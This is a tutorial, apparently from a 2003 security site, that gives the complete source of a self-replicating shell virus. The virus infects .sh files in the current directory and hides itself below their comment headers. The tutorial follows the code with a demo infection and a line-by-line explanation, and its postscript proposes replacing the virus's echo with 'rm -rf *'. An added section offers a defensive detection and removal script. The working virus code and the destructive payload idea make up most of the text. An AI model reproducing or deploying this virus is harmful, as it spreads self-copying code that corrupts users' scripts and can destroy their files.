An Introduction to Shell Viruses
1. Introduction
Viruses always carry a slightly mysterious flavour. Thinking back to my first DOS virus, written in assembly, it was painful work: from the first idea to the finished program took more than three months, and the code was messy too, so the early admiration has worn off. Recently I wanted something that infects other files and spreads itself; writing a virus in shell is not very hard, so I wrote this little script, whose only function is to infect other shell programs.
This program is not of much use in reality, but it is very helpful for understanding the propagation mechanism of a virus; you could say its teaching value is greater than its practical value.
2. Program code
#!/bin/sh
# File name: virus_demo.sh
# Purpose: SHELL virus demonstration.
# Description: the virus infects every file ending in .sh in the current directory, but does not infect a file twice.
# Author: Watercloud@xfocus.org
# Date: 2003-5-13
#B:<!A%C&T:>
vfile=$_;vtmp=/tmp/.vtmp.$$
for f in ./*.sh;do
  if [ ! -w $f -a ! -r $vfile ];then continue;fi
  if grep '<!A%C&T:>' $f;then continue;fi
  if sed -n '1p' $f | grep 'csh';then continue;fi
  cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
  vno=`awk '$0 ~ /(^\b*#)|(^\b*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
  sed -n "1,${vno}p" $vtmp > $f
  (sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
  vno=`expr $vno + 1`
  sed -n "${vno},\$p" $vtmp >> $f
  rm -f $vtmp
done >/dev/null 2>&1
unset vtmp;unset vfile;unset vno
echo "Hi, here is a demo shell virus in your script!"
#E:<!A%C&T:>
#EOF
The shell is powerful: such a short program can infect other program files.
3. Demonstration
Let's run a test.
First put two files in the current directory: one is the virus file, the other is the file to be infected.
[cloud@/export/home/cloud/vir]> ls -l
drwxr-xr-x   2 cloud    staff        512 6月  4 17:43 ./
drwxr-xr-x  10 cloud    staff       1024 6月  4 17:41 ../
-rwxr--r--   1 cloud    staff         89 6月  4 17:43 test.sh
-rwxr--r--   1 cloud    staff        773 6月  4 17:42 virus_demo.sh
Let's take a look at our victim script; it is very simple:
[cloud@/export/home/cloud/vir]> cat test.sh
#!/bin/sh
# just a demo for virus test
# author: foo
# date: 3000-1-1
ls -l
#EOF
Now infect it:
[cloud@/export/home/cloud/vir]> ./virus_demo.sh
Hi, here is a demo shell virus in your script!
Let's see the result of the infection:
[cloud@/export/home/cloud/vir]> cat test.sh
#!/bin/sh
# just a demo for virus test
# author: foo
# date: 3000-1-1
#B:<!A%C&T:>
vfile=$_;vtmp=/tmp/.vtmp.$$
for f in ./*.sh;do
  if [ ! -w $f -a ! -r $vfile ];then continue;fi
  if grep '<!A%C&T:>' $f;then continue;fi
  if sed -n '1p' $f | grep 'csh';then continue;fi
  cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
  vno=`awk '$0 ~ /(^\b*#)|(^\b*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
  sed -n "1,${vno}p" $vtmp > $f
  (sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
  vno=`expr $vno + 1`
  sed -n "${vno},\$p" $vtmp >> $f
  rm -f $vtmp
done >/dev/null 2>&1
unset vtmp;unset vfile;unset vno
echo "Hi, here is a demo shell virus in your script!"
#E:<!A%C&T:>

ls -l
#EOF
Look: the whole virus body, from
#B:<!A%C&T:>
to
#E:<!A%C&T:>
has been copied over, so the virus has spread.
It is worth noting where the virus was inserted: at the beginning of the effective (non-comment) part of the original test.sh!
This takes into account that in a typical shell program everyone likes to put comments at the top;
if you pushed someone else's comment block down below the virus, it would be far too obvious.
Now let's run our newly infected script and see:
[cloud@/export/home/cloud/vir]> ./test.sh
Hi, here is a demo shell virus in your script!   <- look, the message printed from inside the virus body.
-rwxr-xr-x   1 cloud    staff        724 6月  4 17:44 test.sh
-rwxr-xr-x   1 cloud    staff        773 6月  4 17:42 virus_demo.sh
4. Simple explanation
Let's analyze this virus step by step:
#B:<!A%C&T:>
The virus body's begin tag, used when the program copies itself.
vfile=$_;vtmp=/tmp/.vtmp.$$
Define two variables: a temporary file, and a record of the current program's name taken from $_. This also requires that this line be the first effective (non-comment) line of the program; otherwise we could not obtain the current program's name and would not know where to copy the virus from.
for f in ./*.sh;do
Start the loop: find every program ending in .sh in the current directory.
if [ ! -w $f -a ! -r $vfile ];then continue;fi
Check whether the target is writable and whether the virus source file is readable.
if grep '<!A%C&T:>' $f;then continue;fi
Check whether the target is already infected; if so, spare it. Infecting it a second time would be too much.
if sed -n '1p' $f | grep 'csh';then continue;fi
If the target is a csh script, whose syntax differs too much, give up.
cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
Ready to infect: first make a backup copy of the target. What if the copy fails? Give up, of course.
vno=`awk '$0 ~ /(^\b*#)|(^\b*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
What is this? It looks rather complex, but you can't learn shell viruses without understanding awk and regular expressions. It counts the leading run of comment and blank lines of the program, which makes it easy to determine the insertion point of the virus body.
sed -n "1,${vno}p" $vtmp > $f
One sed command copies those leading lines back from the backup file into the target.
(sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
Another sed does the work of carrying over the virus body.
vno=`expr $vno + 1`
sed -n "${vno},\$p" $vtmp >> $f
The last sed moves the remaining part of the target file back. sed is really powerful!
rm -f $vtmp
Clean up the temporary file.
done >/dev/null 2>&1
End of the loop.
unset vtmp;unset vfile;unset vno
Clean up the crime scene.
echo "Hi, here is a demo shell virus in your script!"
Having infected the file, also show something that tells people this program has been infected by a virus.
#E:<!A%C&T:>
The virus body's end tag, used when the program copies itself.
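Because the virus copies exactly the range between its two marker comments, those same markers are all a defender needs to find it and undo the infection. The following is an added example, not part of the original article: a POSIX sh script that detects the marker and strips the virus body together with the blank line its trailing echo appended; the function names and the constructed sample file are assumptions.

```shell
#!/bin/sh
# Added example (not from the original article): detect and remove the demo
# virus using the same two marker comments it copies itself between.
MARK_B='#B:<!A%C&T:>'
MARK_E='#E:<!A%C&T:>'

# is_infected FILE: succeeds when FILE carries the begin marker.
is_infected() { grep -qF "$MARK_B" "$1" 2>/dev/null; }

# disinfect FILE: rewrite FILE in place without the marker range, and without
# the single blank line the virus's trailing "echo" appended after the end marker.
disinfect() {
    tmp=$(mktemp) || return 1
    awk -v b="$MARK_B" -v e="$MARK_E" '
        index($0, b) == 1 { skip = 1; next }                      # begin marker: start dropping
        skip && index($0, e) == 1 { skip = 0; blank = 1; next }   # end marker: stop dropping
        skip { next }                                             # inside the virus body
        blank && $0 == "" { blank = 0; next }                     # the appended empty line
        { blank = 0; print }                                      # everything else survives
    ' "$1" > "$tmp" && cat "$tmp" > "$1"
    rc=$?; rm -f "$tmp"; return $rc
}

# make_sample FILE: constructed copy of the infected test.sh shown above,
# with the virus body shortened to its first and last lines.
make_sample() {
    cat > "$1" <<'SAMPLE'
#!/bin/sh
# just a demo for virus test
#B:<!A%C&T:>
vfile=$_;vtmp=/tmp/.vtmp.$$
echo "Hi, here is a demo shell virus in your script!"
#E:<!A%C&T:>

ls -l
#EOF
SAMPLE
}

# line_count FILE: number of lines, handy for checking the result.
line_count() { wc -l < "$1" | tr -d ' '; }

sample=$(mktemp)
make_sample "$sample"
is_infected "$sample" && echo "infected: $(line_count "$sample") lines"
disinfect "$sample"
is_infected "$sample" || echo "clean: $(line_count "$sample") lines"
rm -f "$sample"
```

Running it on a real directory is a matter of looping over ./*.sh and calling is_infected before disinfect; the markers are matched only at the start of a line, just as the virus's own sed range does.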
5. Postscript
From this we can see that a script virus is very simple and takes hardly any effort to write, yet its destructive power is not to be underestimated: for example, change the echo line to rm -rf *;
It also shows the power of the shell, compared with how much effort it takes to deal with the PE and ELF file structures.
The above program has been tested on Linux and Solaris; under Cygwin on Windows it should also work.
Once more, for emphasis: this article is written to share an understanding of viruses, not to teach anyone to write viruses and do harm. Remember that!
#EOF
#Game over
echo "Hook Axiang!"
Watercloud@xfocus.org
2003-6-4